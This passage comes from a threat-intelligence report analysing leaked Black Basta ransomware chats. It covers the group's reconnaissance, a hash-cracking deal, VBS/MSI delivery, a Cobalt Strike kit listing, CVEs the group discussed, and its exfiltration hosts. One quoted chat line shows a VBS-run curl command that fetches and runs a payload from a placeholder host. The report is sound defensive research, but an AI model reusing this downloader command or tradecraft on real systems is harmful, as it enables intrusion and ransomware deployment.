a30798880eab8c6158073a38e63d5c014de3976e623e38c29b65dc1e6b0be3ef\r\nRTF (2017 CVE): a633ede541f3b86835ba11aea4278db5b37bb7040a6bb81f057819c0fafcdc99\r\nAdditional “Backdoor” Sample\r\nOne sample is specifically called out as a “backdoor” but no clear family name is given:\r\n3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\r\nReconnaissance\r\nIn the conversations we analysed, we identified discussions regarding the use of Shodan, Fofa, and ZoomInfo for\r\ninformation gathering. In this context, participants were conducting reconnaissance to gather data about their\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 18 of 30\n\ntargets, which could subsequently be exploited.\r\nShodan \u0026 Fofa \u0026 ZoomEye – Used for scanning endpoints that are exposed to the internet.\r\nReconnaissance is very important part of the attack, and the users lapa and gg seems to be the main fan of\r\nthe tools, sharing a lot of output:\r\ncitrix_us_fofa.txt\r\ncheckpoint_eu_fofa.txt\r\ncheckpoint_ca_fofa.txt\r\ncheckpoint_us_fofa.txt\r\nscreenconnect_gb_fofa.json\r\nscreenconnect_gb_fofa.txt\r\nscreenconnect_de_fofa.txt\r\nscreenconnect_de_fofa.json\r\nscreenconnect_au_fofa.txt\r\nscreenconnect_ch_fofa.txt\r\nscreenconnect_ch_fofa.json\r\nscreenconnect_nz_fofa.txt\r\nscreenconnect_nz_fofa.json\r\nscreenconnect_us_fofa.txt\r\nscreenconnect_us_fofa.json\r\nscreenconnect_ca_fofa.txt\r\nscreenconnect_ca_fofa.json\r\nscreenconnect_au_fofa.json\r\nscreenconnect_fofa.tar.gz\r\npulse_us_fofa.txt\r\npulse_ca_fofa.txt\r\npulse_eu_fofa.txt\r\nrdweb_eu_fofa.txt\r\nrdweb_ca_fofa.txt\r\nrdweb_us_fofa.txt\r\nsonicwall_us_fofa.txt \"he has 300k of them here\" https://en.fofa.info/result?qbase64=InNvbmljd2FsbCIgJiYgY291bnR\r\nsonicwall_us_zoomeye.tar.gz\r\nSonicWALL_CA_zoomeye.tar.gz\r\nJenkins_US_zoomeye.tar.gz\r\nJenkins_ca\u0026gb\u0026de\u0026au\u0026ch\u0026nz_zoomeye.tar.gz\r\nCurrent Report of the Shodan Search looking to find Outlook Web Application(OWA): Shodan Search\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 19 of 30\n\nFigure 7: Shodan\r\nAnd FOFA for the same:\r\nFigure 8: FoFa Search 1\r\nSimple FOFA Search employed by Black Basta targeting US SonicWall customers: FOFA Search Engine\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 20 of 30\n\nFigure 9: Fofa Search 2\r\nLink appearing to a public github repository of https://github.com/netsecfish, targeting D-Link ShareCenter Cloud\r\nStorage (NAS):\r\nFigure 10: Fofa Search 3 – https://github.com/netsecfish/dlink/blob/main/fofa-result.png\r\nZoomInfo – Likely used for gathering intelligence on the target organisation.\r\nInitial Access \u0026 Credential Exploitation\r\nHash Cracking Services – @usernameboy joined the forum and @usernamegg asked for a price regarding\r\nNTLM Hashes, with the price of 300 (assumed USD)\r\nusernamegg,\"I found the request\r\nusernamegg,\"okay\r\nusernamegg,I can't figure it out yet\r\nusernamegg,on a single connection\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 21 of 30\n\nusernameboy,\"Yes\r\nusernameboy,Hi\r\nusernameboy,we need to agree on the price for this type of hash netntlm \u003entlm\r\nusernamegg,dp\r\nusernamegg,come on\r\nusernamegg,what's the price?\r\nusernameboy,I think 300\r\nusernameboy,we need a full brute force there\r\nusernameboy,100 for 3\r\nusernamegg,okay\r\nusernamegg,come on\r\nusernamegg,300 let's try to start\r\nusernamegg,well,did you understand how to decrypt them?\r\nusernameboy,Yes,I know\r\nusernameboy,I've been looking for this more than once\r\nusernamegg,has anyone ordered this from you before?\r\nusernamegg,were there any successful finds?\r\nusernameboy,\"Yes\r\nusernameboy,found\r\nusernamegg,\"well yes\r\nusernameboy,only it takes time\r\nusernamegg,yes\r\nusernamegg,okay\r\nusernamegg,how long did it take you to find + -?\r\nusernameboy,Yes it varies but 6 hours minimum\r\nusernamegg,what kind of power do you have?\r\nusernamegg,so I can roughly understand\r\nusernamegg,what cards are worth\r\nusernamegg,?\r\nusernameboy,4090\r\nusernameboy,I'll help a hunter set up a brute force)\r\nusernamegg,#NAME?\r\nusernamegg,come on\r\nusernamegg,is he bothering you?\r\nusernamegg, he also has normal abilities\r\nusernameboy,\"he doesn't know how to\r\nusernamegg,#NAME?\r\nusernamegg,will you decipher it in the end?\r\nusernameboy,Yes, we are looking for\r\nusernamegg,ntlm should get\r\nusernameboy,Yes\r\nusernamegg,ok\r\nusernameboy,\"There is ntlm\r\nusernamegg,let's go to the general chat\r\nusernameboy,already there\r\nusernameboy,Hi\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 22 of 30\n\nUsed to crack NTLMv1 hashes\r\n or attempted to crack password hashes themselves, but paying for services\r\ncould speed up the process.\r\nJenkins \u0026 RDP Targeting – Indicators suggest exploitation of exposed Jenkins servers and RDP access\r\npoints.\r\nSocial Engineering via IT Calls – Impersonation of IT departments for credential theft.\r\nMalware Deployment \u0026 Execution\r\nJavaScript in Malware – Leveraged for execution and persistence.\r\nDLL-based Malware – Use of DLL injection methods linked to Qbot variants.\r\nCobalt Strike – Likely used for command and control (C2), with Malleable C2 profiles observed.\r\nVBS \u0026 MSI Scripts – One of the more intriguing aspects of the discussions was Black Basta’s transition\r\nfrom using MSI file types to VBS scripts. They utilised a service called temp[.]sh to host these files online,\r\nenabling them to be embedded within malicious scripts for deployment.\r\nThe internal discussion regarding Black Basta focuses on MSI and VBS scripts, along with various other topics.\r\n## September 21, 2023\r\n**@usernamegg**\r\n\u003e We can try MSI with LNK. Need to test.\r\n\u003e VBS should be clean only by Monday.\r\n\u003e Or I can try to clean up this VBS.\r\n\u003e Let's clean it up.\r\n**@w**\r\n\u003e Do you have MSI or VBS?\r\n\u003e I have LNK ready immediately for MSI too.\r\n---\r\n## September 26, 2023\r\n**@usernamegg**\r\n\u003e [11:16:35] True PDF + XLL: What is being distributed right now—VBS or MSI?\r\n---\r\n## September 28, 2023\r\n**@w**\r\n\u003e Testing VBS.\r\n\u003e Will rework LNK now.\r\n\u003e If VBS turns out bad.\r\n**@usernamegg**\r\n\u003e Everything should be fine with VBS.\r\n---\r\n## October 2, 2023\r\n**@lapa**\r\n\u003e What does XLL execute, MSI or VBS?\r\n**@usernamegg**\r\n\u003e VBS.\r\n---\r\n## October 4, 2023\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 23 of 30\n\n**@usernamegg**\r\n\u003e I can only build one VBS.\r\n**@lapa**\r\n\u003e Right now, we are distributing zip + VBS.\r\n---\r\n## October 9, 2023\r\n**@usernamegg**\r\n\u003e The old MSI build was taken down.\r\n\u003e Once I link a new domain to a new server where the new software is,\r\n\u003e I'll distribute MSI and VBS from there.\r\n\u003e We’ll see which works better.\r\n\u003e I think VBS is better, but the execution method in the file will be different.\r\n---\r\n## October 10, 2023\r\n**@lapa**\r\n\u003e At least VBS gives a warning.\r\n\u003e MSI doesn't seem to.\r\n**@usernamegg**\r\n\u003e I'm taking the certificates and making VBS.\r\n---\r\n## October 16, 2023\r\n**@w**\r\n\u003e It was slightly different in VBS.\r\n\u003e The VBS script downloaded a simple command from the panel,\r\n\u003e like `cmd.exe /c curl.exe http[:]//domain.com:2351/adfguwie4 -O autoit.exe`,\r\n\u003e and just executed it.\r\nFigure 11: Fire Hosting Service\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 24 of 30\n\nCobalt Strike Arsenal kit\r\nThe collection of customizable tools that enable users to better simulate real-world adversary tactics and\r\ntechniques. – https://www.cobaltstrike.com/product/features\r\n.\r\n├── arsenal_kit.cna [32K]\r\n├── artifact [4.0K]\r\n│ ├── artifact32big.dll [455K]\r\n│ ├── artifact32big.exe [456K]\r\n│ ├── artifact32.dll [42K]\r\n│ ├── artifact32.exe [42K]\r\n│ ├── artifact32svcbig.exe [452K]\r\n│ ├── artifact32svc.exe [38K]\r\n│ ├── artifact64big.exe [454K]\r\n│ ├── artifact64big.x64.dll [454K]\r\n│ ├── artifact64.exe [42K]\r\n│ ├── artifact64svcbig.exe [450K]\r\n│ ├── artifact64svc.exe [38K]\r\n│ ├── artifact64.x64.dll [42K]\r\n│ ├── artifact.cna [9.3K]\r\n│ ├── paygen_big.py [9.7K]\r\n│ ├── sgn [7.9M]\r\n│ └── sgn.conf [557]\r\n├── mimikatz [4.0K]\r\n│ ├── mimikatz-chrome.x64.dll [755K]\r\n│ ├── mimikatz-chrome.x86.dll [624K]\r\n│ ├── mimikatz.cna [1.2K]\r\n│ ├── mimikatz-full.x64.dll [794K]\r\n│ ├── mimikatz-full.x86.dll [688K]\r\n│ ├── mimikatz-max.x64.dll [1.4M]\r\n│ ├── mimikatz-max.x86.dll [1.1M]\r\n│ ├── mimikatz-min.x64.dll [306K]\r\n│ └── mimikatz-min.x86.dll [270K]\r\n├── process_inject [4.0K]\r\n│ ├── processinject.cna [3.2K]\r\n│ ├── process_inject_explicit.x64.o [2.0K]\r\n│ ├── process_inject_explicit.x86.o [2.1K]\r\n│ ├── process_inject_spawn.x64.o [1.7K]\r\n│ └── process_inject_spawn.x86.o [1.7K]\r\n├── resource [4.0K]\r\n│ ├── compress.ps1 [205]\r\n│ ├── resources.cna [6.5K]\r\n│ ├── template.exe.hta [830]\r\n│ ├── template.hint.x64.ps1 [2.7K]\r\n│ ├── template.hint.x86.ps1 [2.8K]\r\n│ ├── template.psh.hta [197]\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 25 of 30\n\n│ ├── template.py [635]\r\n│ ├── template.vbs [1017]\r\n│ ├── template.x64.ps1 [2.3K]\r\n│ ├── template.x86.ps1 [2.4K]\r\n│ └── template.x86.vba [3.8K]\r\n├── sleepmask [4.0K]\r\n│ ├── sleepmask.cna [1.6K]\r\n│ ├── sleepmask_pivot.x64.o [1.4K]\r\n│ ├── sleepmask_pivot.x86.o [1.4K]\r\n│ ├── sleepmask.x64.o [1.2K]\r\n│ └── sleepmask.x86.o [1.2K]\r\n└── udrl [4.0K]\r\n ├── ReflectiveLoader.x64.o [3.2K]\r\n ├── ReflectiveLoader.x86.o [2.7K]\r\n └── udrl.cna [11K]\r\nExploitation \u0026 Privilege Escalation\r\nMicrosoft Outlook RCE Exploit – This zero-click vulnerability in Outlook allows for remote code\r\nexecution without user interaction.\r\nWindows 10 RCE Exploit – A technique that circumvents ASLR/DEP protections, enabling remote\r\nexecution of code.\r\nESXi Server Targeting – A report from Microsoft back in 2024 highlights a concerning trend:\r\ncybercriminals are exploiting vulnerabilities in ESXi servers to deploy ransomware. This malicious activity\r\nposes significant risks to organisations relying on these servers. For more information, you can read the full\r\narticle on Exploiting ESXI servers to deploy ransomware.\r\nSearchProtocolHost.exe Abuse – The exploitation of Windows system process for the covert execution of\r\nmalicious activities is a significant concern. This process is often targeted for techniques such as Process\r\nHollowing, which is a specific sub-technique within the broader category of Process Injection.\r\nUse of Proof of Concept Exploits:\r\nCVEs mentioned in the discussions or references and their age at the time of mention\r\nThe group seems to focus on both emerging vulnerabilities and previously identified ones during their discussions:\r\nDate of\r\nMessage\r\n(UTC)\r\nCVE Product\r\nCVE Official\r\nAnnouncement Date\r\n(UTC)\r\nCVE Age at\r\nthe time\r\n(Months)\r\n2024-04-18\r\nCVE-2024-\r\n21338\r\nMicrosoft Windows\r\n(Kernel)\r\n2024-04-18 0\r\n2024-04-15\r\nCVE-2024-\r\n21762\r\nFortinet FortiGate SSL\r\nVPN\r\n2024-04-15 0\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 26 of 30\n\n2024-04-14\r\nCVE-2024-\r\n3400\r\nPalo Alto Networks\r\n(PAN-OS)\r\n2024-04-12 0\r\n2024-04-04\r\nCVE-2022-\r\n27925\r\nZimbra Collaboration\r\nSuite\r\n2022-05-05 22\r\n2024-03-27\r\nCVE-2024-\r\n1086\r\n(Uncertain) Possibly\r\nLinux-based or Web-based?2024-03-27 0\r\n2024-02-25\r\nCVE-2024-\r\n1708\r\nConnectWise\r\nScreenConnect\r\n2024-02-25 0\r\n2024-02-25\r\nCVE-2024-\r\n1709\r\nConnectWise\r\nScreenConnect\r\n2024-02-25 0\r\n2024-02-15\r\nCVE-2024-\r\n21412\r\nMicrosoft Windows\r\nDefender\r\n2024-02-15 0\r\n2023-12-15\r\nCVE-2017-\r\n5715\r\nIntel CPU (Spectre\r\nVariant 2)\r\n2018-01-03 71\r\n2023-12-15\r\nCVE-2017-\r\n5753\r\nIntel CPU (Spectre\r\nVariant 1)\r\n2018-01-03 71\r\n2023-12-15\r\nCVE-2017-\r\n5754\r\nIntel CPU (Meltdown) 2018-01-03 71\r\n2023-12-13\r\nCVE-2023-\r\n35628\r\nMicrosoft Word\r\n(Office)\r\n2023-08-08 4\r\n2023-12-05\r\nCVE-2023-\r\n23397\r\nMicrosoft Outlook\r\n(Windows)\r\n2023-03-14 8\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 27 of 30\n\n2023-11-23\r\nCVE-2023-\r\n3466\r\nCitrix ADC/Gateway 2023-07-18 4\r\n2023-11-23\r\nCVE-2023-\r\n3467\r\nCitrix ADC/Gateway 2023-07-18 4\r\n2023-11-23\r\nCVE-2023-\r\n3519\r\nCitrix ADC/Gateway 2023-07-18 4\r\n2023-11-22\r\nCVE-2023-\r\n4966\r\nCitrix NetScaler\r\n(ADC/Gateway)\r\n2023-11-14 0\r\n2023-11-14\r\nCVE-2023-\r\n36844\r\nJuniper Networks (J-Web)\r\n2023-08-16 2\r\n2023-11-14\r\nCVE-2023-\r\n36845\r\nJuniper Networks (J-Web)\r\n2023-08-16 2\r\n2023-11-07\r\nCVE-2020-\r\n1472\r\nMicrosoft Netlogon\r\n(Windows Domain)\r\n2020-08-11 38\r\n2023-11-06\r\nCVE-2023-\r\n36884\r\nMicrosoft\r\nWindows/Office\r\n2023-07-11 3\r\n2023-10-25\r\nCVE-2023-\r\n36745\r\nMicrosoft Exchange\r\nServer\r\n2023-09-12 1\r\nCommand \u0026 Control (C2) Infrastructure\r\nCustom C2 Frameworks – This section delves into the creation of tailored Command and Control (C2)\r\ninfrastructures.\r\nSOCKS Proxy Services – These services are employed for traffic obfuscation and tunnelling purposes.\r\nHTTP \u0026 DNS Beacons – These may be linked to configurations used in Cobalt Strike.\r\nFile Hosting \u0026 Data Exfiltration\r\nFile-sharing Services Used:\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 28 of 30\n\nhxxps://send.vis[.]ee – Free File sharing service – (Still operational at the time of writing this blog)\r\nhxxps://transfer[.]sh – Open Source file sharing platform.\r\nhxxp://temp[.]sh – At the time of writing this blog, the service still remains operational. For further\r\ndetails, please refer to Figure 1 located in the subsection titled “Malware Deployment \u0026\r\nExecution.”\r\nFTP has been widely used and SFTP has become more prominent over time\r\nLeak SiteOnion addresses\r\nOver 400 messages appear to mention .onion sites, both basta, lockbit, rhysida and other addresses\r\nprimarily for victim leak communication, and other leak forums.\r\nMITRE Techniques\r\nThe analysis of the conversations revealed several discussions focused on specific operations. We can interpret\r\nthese findings through the tactics outlined in the MITRE Framework. The graph below illustrates the tactics\r\nidentified from the conversations in the leaked bestflowers.json dataset.\r\nFigure 12: Black Basta MITRE Techniques\r\nConclusion\r\nThe leaked conversations of Black Basta provide a rare and valuable glimpse into the inner workings of a\r\nransomware group. Their structured approach uses advanced tactics and a methodical strategy for victim selection,\r\ndemonstrating a high level of operational sophistication.\r\nDespite recent inactivity, the data suggests internal conflicts rather than a complete shutdown, meaning Black\r\nBasta or its key members could resurface under a different guise. Their operational model aligns with other major\r\nransomware groups, focusing on financial gain through strategic targeting and calculated negotiations rather than\r\nindiscriminate disruption.\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 29 of 30\n\nThe attack chain typically begins with network reconnaissance, followed by exploitation of vulnerabilities in\r\nVPNs, firewalls, or phishing campaigns with malicious attachments. The group has been fairly interested in a\r\nwide variety of remote code execution(RCE) vulnerabilities.\r\nPost-compromise, they employ credential stuffing, NTLM password cracking, and Cobalt Strike Arsenal kit both\r\nfor lateral movement and persistence.\r\nAs part of the infrastructure they used proxy chains, file sharing services, TOR, and TOX for general\r\ncommunications.\r\nFor cybersecurity teams and law enforcement agencies, these insights emphasize the need for continuous\r\nmonitoring, proactive threat intelligence, and improved security measures to counteract evolving ransomware\r\nthreats. Organisations should prioritise robust authentication measures, endpoint and server protection, phishing\r\nawareness training, backups and network segmentation to mitigate the risks.\r\nSources\r\nhttps://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\r\nhttps://github.com/dutchcoders/transfer.sh\r\nhttps://www.theregister.com/2025/02/21/experts_race_to_extract_intel/\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/storm-0506\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/ta2101\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/unc4393\r\nhttps://ecrime.ch/\r\nhttps://x.com/PRODAFT/status/1892636346885235092\r\nSource: https://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nhttps://www.ontinue.com/resource/inside-black-basta-leaked-coversations/\r\nPage 30 of 30", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.ontinue.com/resource/inside-black-basta-leaked-coversations/" ], "report_names": [ "inside-black-basta-leaked-coversations" ], "threat_actors": [ { "id": "e9f85280-337c-4321-b872-0919f8ef64a6", "created_at": "2022-10-25T16:07:24.261761Z", "updated_at": "2026-04-10T02:00:04.914455Z", "deleted_at": null, "main_name": "TA2101", "aliases": [ "Gold Village", "Maze Team", "TA2101", "Twisted Spider" ], "source_name": "ETDA:TA2101", "tools": [ "7-Zip", "Agentemis", "BokBot", "Buran", "ChaCha", "Cobalt Strike", "CobaltStrike", "Egregor", "IceID", "IcedID", "Mimikatz", "PsExec", "SharpHound", "VegaLocker", "WinSCP", "cobeacon", "nmap" ], "source_id": "ETDA", "reports": null }, { "id": "f994aa54-3581-460a-9c1f-5ca6b1af4aa1", "created_at": "2024-08-20T02:00:04.537819Z", "updated_at": "2026-04-10T02:00:03.686083Z", "deleted_at": null, "main_name": "Storm-0506", "aliases": [], "source_name": "MISPGALAXY:Storm-0506", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "908cf62e-45cd-492b-bf12-d0902e12fece", "created_at": "2024-08-20T02:00:04.543947Z", "updated_at": "2026-04-10T02:00:03.68848Z", "deleted_at": null, "main_name": "UNC4393", "aliases": [ "Storm-1811", "CURLY SPIDER", "STAC5777" ], "source_name": "MISPGALAXY:UNC4393", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3c864b3-fac9-4d56-8500-7c06c829fbf8", "created_at": "2023-01-06T13:46:39.071873Z", "updated_at": "2026-04-10T02:00:03.203749Z", "deleted_at": null, "main_name": "TA2101", "aliases": [ "GOLD VILLAGE", "Storm-0216", "DEV-0216", "UNC2198", "TUNNEL SPIDER", "Maze Team", "TWISTED SPIDER" ], "source_name": "MISPGALAXY:TA2101", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434452, "ts_updated_at": 1775826736, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/85bc8992c6e30f3420a14d18e477242505872058.pdf", "text": "https://archive.orkl.eu/85bc8992c6e30f3420a14d18e477242505872058.txt", "img": "https://archive.orkl.eu/85bc8992c6e30f3420a14d18e477242505872058.jpg" } }